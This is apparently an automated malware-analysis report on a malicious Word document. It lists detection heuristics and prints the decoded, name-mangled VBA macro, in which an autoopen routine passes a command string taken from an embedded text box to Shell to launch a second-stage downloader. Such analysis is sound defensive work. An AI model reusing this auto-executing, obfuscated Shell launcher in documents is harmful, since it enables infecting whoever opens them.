MALICIOUS
252
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059 Command and Scripting Interpreter
T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The 'autoopen' macro is present and the 'Shell()' function is called, indicating an attempt to execute arbitrary commands. This is further supported by the 'SC_STR_CMD' heuristic firing, suggesting 'cmd.exe' invocation. The primary function of the macro appears to be downloading and executing a second-stage payload.
Heuristics 9
-
ClamAV: Doc.Malware.Sload-6786412-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Malware.Sload-6786412-0
-
VBA macros detected medium 3 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
Set URWSSQPwNjjHYGVvjkcB = FcwvpOjshGwzwmVsn tqcJvtj = Array(lKHMG, OPpYWcBfD, dnIaTzDw, Interaction.Shell(hTkfEAKVZ, oTfUAQ), EIXdSCCG) Select Case jmuQzOLbQRnLtlJwvBajR -
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
AutoOpen macro low OLE_VBA_AUTOOPENAutoOpen macroMatched line in script
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox" Sub autoopen() tHoZW -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
-
Suspicious extracted artifact info EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 9460 bytes |
SHA-256: bf970ea67c5817222de0d9737de36739f94e44a14a6f5463415cf81fa4cc705c |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
249 of 290 identifiers look randomly generated (e.g. 'IUZhOKmjDqIETYpPlhaoivuM') — consistent with name-mangling obfuscation.
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "zRkJzvXEwSHfh"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Sub autoopen()
tHoZW
End Sub
Attribute VB_Name = "BdMwUzkJaOKiV"
Function tHoZW()
On Error Resume Next
Select Case kiWwaujhUXspfLwiJOsbCQ
Case 57353313
ioOuMdZzPMMarXjdotSFHi = AqUhqdBlUZjOlfp
qzsZTzWnliPmIzDiDf = Log(DrwiVNbsAKJzzwXc)
PEpAUhvMOPcWWwK = 42963309
miuPWMsHVcchSnkUv = zpNiJAWHzwVdLwrfM
Case 297766880
rsrztwETfvbsCajLQEDVu = 295288974
OulsQipnbrmDZHsTk = Log(jrLWGTDfmaaIXo)
dcDIGoopIAAPWGEYlTQNBDso = 120355477
lsPMSTwEwipLdQsCCWFEjZ = Log(BopHazZkOpRDwZwhjQRJZ)
End Select
Set apAUzAWiOILJNXdMXHWua = MNvcGoYnOQISOzGGwZ
Select Case rzXFitMYEbvTMwL
Case 227260942
JfhcNnjkHQdWokqvJGLiuz = ZNnOFLQXzdpbaqjdKrVb
iCQrFYCpAEsKwHPaZbZr = Log(jtzIPEccBmZXDrKXWzmNiwY)
RciQDkQvkkCJRipTZMzSTmvQ = 33480947
CbmiKjUCrnVMYQ = dnSoBGoKTnVzGcijSL
Case 7613719
pIGaSoOrBwNniwpwdbDwO = 111302186
qolNZMGDAXijVhrWMr = Log(IUZhOKmjDqIETYpPlhaoivuM)
APUQlFqERIwRHWDmj = 17844185
sTPHfSGplCSNZMRO = Log(RPSkRABPqziKXCzshUwlHpw)
End Select
Set QEBwvZEpIIURkcbSNrpU = iOAVUssUdmcRnUMwDUR
Select Case MwImJvQirjGfjsN
Case 44858256
VwJVQjGPlRAFnwUB = QdkSEhHvQorDaPX
nhKfmwNBXYdQcEnmdbckW = Log(QOCZAvPMKCcXzPKWUUQivjD)
TLBEZwnnLtQvdNvSlLNboEF = 154040954
GHHTowjLLGotLmLOoMFw = tHYzwjScCOGibSrfT
Case 151405004
hkRHHYaYBMzrzYNNzjVrORi = 57728233
hPjTUiUpLRibzRZVKRQDXHF = Log(ErwwffQBJQZJrFhd)
CnHjmARwVDARFTaKVOcl = 148394072
fBcSjrQiFjnYVTwi = Log(rfBJbPkDwwwWqFrIr)
End Select
Set FGUQajrwQihwGMq = kGVADlsOnsRHOdwPdKsXzbFV
Select Case rzXKotwGiELLrZPNnp
Case 72798803
ZqYrFURfKvlHJFNBj = WTYiEThtCpGQvUKiwBb
FUbQvjTEBlLNdNTrrrlF = Log(LRbZuzQwiJMaEUBr)
mVAcsRisniASnFQ = 146445693
tDzrBjCHWcznZtSAjE = EhTzzhHRPirDvEiaw
Case 289250599
lmzVVpiEOoiREBARo = 170931595
BJuRmcfYDjqSTI = Log(SdGLzKTctchMnCvmuA)
qGrULsqQaVXWOJkiXKccsih = 6703365
FPsVIwwRZSMbIvTHtsGVGS = Log(CUYcRYBHZqfFcw)
End Select
Set SZaFpqYGOPJUzqafjmLqBjU = sXLmldpqJwZhuAdNdNJM
Select Case jWAPwlSPbObCpzOLaSQH
Case 79629018
GjpSXkzHnkjSzXtnYXzTIpTC = dvwwAQUSiQUaiOhPUaqVWA
RmttJtpQNmitoBKnUMAQHZM = Log(JPDnPcjRcFjJGXKZszGnAUt)
JnVJWkisZzkupCAk = 41002383
RjUBjwBaYISZuoWp = bGXusWnjGnQkqwWhmDJt
Case 51897782
ZIvMaaAFvYzXZdi = 122401870
MjRZJkqhJvrHlMwWVhP = Log(jwNjBsslSZtwUizMqjPXFiRi)
wJLCBDvTTrQTiYR = 291860863
PjCtnGPkjoSstCf = Log(aDijiRWziAnjsHIwiAPhc)
End Select
Set KDwRUPdbaplkHVjLW = NEOmTirYfTNtnzGLsijRwGUD
Const oTfUAQ = 0
Select Case MXtCHtCIsrvYnjLnzS
Case 241144482
MbAwijmosFYfsCnRKbL = XfnLCwzCwuVNWEGkXzTYGOQm
QflwucXGnDhnpumlkp = Log(jKInvCuMInqIPArmQMGDRzGj)
ZwhChmWYTDIHsp = 303973891
QPTzuRnzIVYilf = EZmWFMKaBTkwzjiYXLDBin
Case 250985484
HJjuMNsmnREiFTo = 260088235
pRdKVpOdwBSidDQ = Log(iOvdPOnbzIjiwSEXPwsVIz)
TURPMaEKNnvbEtKqbiCMN = 62594655
hiwvShLuihdcIwzaAtzTq = Log(rAiFFRqGkYKkjl)
End Select
Set fldBsQtbQBscEBTPq = jmwQMbuEYzESXONKVHURzkw
Select Case FXXRvvhRPAIlpDWi
Case 194104910
GcBSaSzCDjzQlSVVNi = fpwKwPwfDozfHDzBCImwESt
ATwPqPTprlzfJRFDcnwNGBq = Log(lQTNaioNwEKcQjpn)
HnVFTskDjURVfmwdld = 169257636
GOIwkjFHcmszJswOUHRYiKrO = rQRLziGPqPtfYVknda
Case 322775971
TMnokIiLBNwXuYsSnvd = 51111293
hSdFivmhkFjumDfddbqAuO = Log(TVkAdSAhzpomuKjBNsiQ)
MdHVMpJUmHsTpJj = 329187995
IOkXlEzRlSuZdIQzUGsdiQdq = Log(KhwSEAzDRjPflaYJ)
End Select
Set bWOuJzcWVDqUQs = uJaXBzjSuVLYARifUUboG
Select Case oLhqsYnpsCAGaOJSvFIzYXzl
Case 338716883
FDtKvZQltwRWvCUhvStjzSNH = ziiaQNvrwTjviGa
pUKAZKGdrcirSwmqmEvrlK = Log(kViwjklNLTrKzCGjpbBj)
jEYAjtIiLiDirZfuLXsFPS = 161728529
mpnjYGPkboBRGwCrciA = nfGcbldEJdZRfzOrFcGET
Case 129104099
CYNoNUAcjRonGi = 71918406
mdLawPjmIkLmAcv = Log(UcDENzPkIAszrKHIu)
TbHtFmobjdIOcDWXTi = 203740878
roNbRzWkuwcDrdI = Log(JbXQPmRmbuXpdUrcdo)
End Select
Set iOjbHQEjhAFXzuCNsHOq = XazXZhHaHAZDziF
Select Case OZAzSzBZddPmDkUpkfi
Case 162369633
djDjEDwwSfGlUpdOaRbrwajf = DaaVfIYwckqwPNvE
KzJAjvraKOChwDzYZBdW = Log(nXhnsEmRKDjmVPlWJUi)
uVtVRfhqYqMRiCXabNqrF = 62594835
KWubnNCPjwofRd = VNWwtTqOETrLuvdn
Case 192621444
VizWEtcVbjTtWFzPrdUIQ = 216043330
IqHvCHTCLLuwuMzIcU = Log(rKvKwmOfEASUUoOqfw)
ZOHdHicJCCsUrotoKNjKJobP = 15127277
qZHjVTMiuIkjnbUdLdLfajb = Log(EdzlokmsbPsCBWjYINtkEdaE)
End Select
Set jdwDWRJwIbsUaqJVsFYiSb = wnXNnrvbDuvHHooEzjEtuo
hTkfEAKVZ = zRkJzvXEwSHfh.TextBox1 + oBQwE + jOMXBV + MApZi + uIjqqDc + GsNzju + BYYCT + hDAaz + CohhIWa + idznAG + tfuimQC + WusjH + EnCWu
Select Case uDZsbNPiKDdDoobhRWrXnPDt
Case 267761445
jIbFHEnSfRLiPilpwwZdwF = jMjRzIfzjDpiHGFv
PVIJVnHImzQHTLpizvs = Log(nqKASfbZEijsBBNawBK)
YILKOsMszAJKNUlZKIr = 275996134
iDHOYFSwPhvlSCif = laSiZEVYihPnQo
Case 69680003
NqEDvpmutkSOZvRGtK = 147990808
XdIzmquYCKwtkQEMZ = Log(EwnYpomGwjPIuFRtzkh)
RFvNrjlZdJqFhRF = 174037445
woTNfrKItQtbrSUiTKzA = Log(hGCMdptKbczrQzwNsmN)
End Select
Set EzSszlqVbNHGaDQhRABCR = SntkbTYQbYlPUknKPrwXjNVt
Select Case uXGwEhTXMiMPdTAjAjwjGJo
Case 271537286
jpsuUrkBdRXcDLfiTmimYS = qOwWzukliRKYsacrncNzB
GwVTCmWKCPOEBfVUkHtj = Log(LtmmDqvrKKSiOICAjrzOYO)
KnZzWSrGGVovDihwvbSsFwW = 260843705
TTEPvRPwzbwitYYSEL = aMwRzsCnGWpORlZC
Case 336653597
qKDYzEGiUCCuZAkJNKUBFX = 298118808
JaKNjsTWZfOAJBNuKQYA = Log(LwoiIXPiziSRZOYttBbif)
uljzMzZroztswdVjYU = 30254181
bwvijmoAROwRFpBDuJLRIG = Log(TYhQvYKdHdrtzpBPZIYZaCb)
End Select
Set IcRpPJmfVDbKCWtcGlpnNw = NttmJjjTRwuHSH
Select Case aYbmZGiBTpGaHZrZMzt
Case 314534031
nrCutOTamviccTqdfaMkiq = cNTWXjvMIlpnhYrfrKbh
YwfGAvjYhLDwNZhaswuqjaq = Log(fJEovVaHJjEPoPWkOnbalq)
zKFwNjqKwHsaqqsdLl = 313966616
iURmdZJcvwQBpqFdpWMbSY = HvofuVKPpqDpisS
Case 138562838
WOPzrrlAlPnpZUUFOKqptP = 41736862
jaLlAakXBYEEJHPECfJGX = Log(QVikQibfuHHiPQjzzKf)
nAPPvHvmmOGzNIKpD = 110765657
CvVizzfrwYCfwbHn = Log(FSoJnptfBHQHFqwjz)
End Select
Set URWSSQPwNjjHYGVvjkcB = FcwvpOjshGwzwmVsn
tqcJvtj = Array(lKHMG, OPpYWcBfD, dnIaTzDw, Interaction.Shell(hTkfEAKVZ, oTfUAQ), EIXdSCCG)
Select Case jmuQzOLbQRnLtlJwvBajR
Case 285319693
KfRtSXiPVvFFjbEYhVuoRKvz = JklKGOTpqjljVsDm
RQnjZXqcsKWCiz = Log(UhJnsFOjlPtrTsMdqCPsf)
fjMuhNEzmMjBLnjP = 298732401
DjCQjfXkjjjAOGEKCZawXAco = jHRjZtaISpvHOCjWzhXQ
Case 254155063
cwAkJpuZCGNoAXFDHnFrwRID = 261115775
tbaTFXpjiVfojlOsmp = Log(aCIRtZkLvBLnzzmvTziBqwR)
kXSDTdDiTJNUkKjtVMuhThi = 284862808
qvsDoDclPjVHjrSzjUnkSKIT = Log(fdDjZDpbGdiKafGkjUiLmo)
End Select
Set ckmMuHifmZOIZYCqcf = ZOkmFpjzjpdICqJbwmqu
Select Case oOZkKBoTAciYKTohFcmPok
Case 239189628
qzSnaBmbalPfWRWZdqPmoJ = BBtzEZOBDiluKjAtzqCz
DJKnFNmzUzzjSQmhBiC = Log(kLBlWMpczPvlLIws)
LwMbDjjlOrSNMwIAlorHZ = 110848528
XJzEBOUKSuwqjqkjcUzIUXO = RnkaUGkJuEoREiiXthzTO
Case 52159274
KBHPnZIZzuOmOdupMKo = 311774832
BSczpbPmYvWJOaZMrzjm = Log(oXprQtzsnJZMtIifRzws)
bzrdzDVcVMFIzNvmFZhQuk = 249063650
zVRqhZzlutMXzORqdPRwUDtv = Log(sLXQcrqNufilivvNTOGAXp)
End Select
Set IrmfTpdtbWEpNcURBVKDimE = UWjApnvOCUPZqMXYQmCPaFhl
Select Case FTjMhGmTAFROdb
Case 102842581
vSpDvnEOVtfjoPpMOBzSFzP = CisNhXYjMiAJNiFR
RrnbFikPEAcdzowCj = Log(NvrjzVwTFPjzjw)
EnHbiwDHwdXwFPuEGhds = 149390831
ktSilYViEQfwtBoazE = ntDZYrELKZSGDIhC
Case 91918816
EKfmPYHQGWtQjjZ = 230547347
dhUumhNKImKcpLwaRstiB = Log(iSIkhSutijUZDUtORcSb)
mznRKupOqfEizDC = 245757069
AuQPDdHPHdjCbQ = Log(ZXsUVTWXEisAPrER)
End Select
Set dPcXLrjTfBDRIMPPsIbKhQi = WLkKcsYDLpYLooOfIBpR
Select Case lToYEVQjbzLlzOvHHcLEKn
Case 141022193
SIYmWTwNVBnvAZwWSkaR = IpoGTLLXKizzHF
zdJHAwQvbAGhfomZNEjKSkfC = Log(nqKWpztUAZobSQB)
uNGNdjiXEktavdMwGzNHFYl = 19925767
NiPzzuniRYXZpiGI = SEDTYWNqUTDumVbDBQBTaG
Case 280152203
vdFpYRUGzSGjzto = 52390615
HdakkiDvWoNFoM = Log(OwXuQYSDwwuUOvDH)
tRTdQWLzCtBdHBLFvRC = 140164336
rdoZboqKoASjlLXthwaMvOf = Log(aruiOSdAmiCniDohU)
End Select
Set NsiwVpoMOTbIwcwYzjtHvW = StCJjOdKssGAmhdWFu
End Function
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.